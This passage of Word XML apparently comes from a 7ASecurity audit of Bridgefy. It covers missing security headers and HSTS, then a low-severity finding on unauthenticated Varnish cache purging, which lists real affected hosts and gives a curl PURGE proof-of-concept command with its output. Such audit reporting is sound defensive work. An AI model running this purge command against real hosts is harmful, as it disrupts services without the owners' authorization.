      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>initiated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>by the browser. Omitting this header is widely known to assist a specific attack scenario that manipulates the browser into rendering a resource as an HTML document, which ultimately incurs Cross-Site-Scripting (XSS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="372" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Strict-Transport-Security (HSTS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: When missing, this allows adversaries to downgrade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>clear-text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTP,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>facilitating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MitM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487632896">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>164035</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="117" name="Graphic 117"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="117" name="Graphic 117"/>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2.916216pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15683584;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape87" coordorigin="1440,258" coordsize="2880,0" path="m1440,258l4320,258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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>182</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId273">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cure53.de/xfo-clickjacking.pdf</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BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>widely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tools,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sslstrip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>183</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>advised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>HSTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1440" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Strict-Transport-Security:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="13"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>max-age=31536000;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="14"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>includeSubDomains;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>avoid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>HSTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>due</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>potential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>184</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In general, integrating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>considered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>best</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>practice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should be actioned by the developer team where appropriate. The aforementioned headers should be inserted into each and every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>response,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>including</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>responses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>such as 4xx. Since these headers should be set consistently, 7ASecurity would like to underline the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>significance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>retaining</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>specific,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shared,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>central area. A load balancing server or similar could be deployed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>achieve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>though</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this is deemed infeasible, mitigation could be achieved by utilizing the web server configuration in conjunction with a matching module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-044</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Unauthenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Varnish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Purge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that multiple Bridgefy hosts are vulnerable to unauthenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>purge attacks. This problem occurs due to a misconfigured Varnish web cache. An unauthenticated malicious attacker might leverage this weakness to delete cached contents in the servers, hence causing recurring queries to the databases and generating unnecessary bandwidth usage, which might increase the odds of potential </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Denial-of-Service </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(DoS) attacks. This can be verified in any of the affected servers as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="5637" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected Hosts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>developer.staging.bridgefy.me admin.bridgefy.me beta.bridgefy.me</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -X PURGE https://developer.staging.bridgefy.me -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
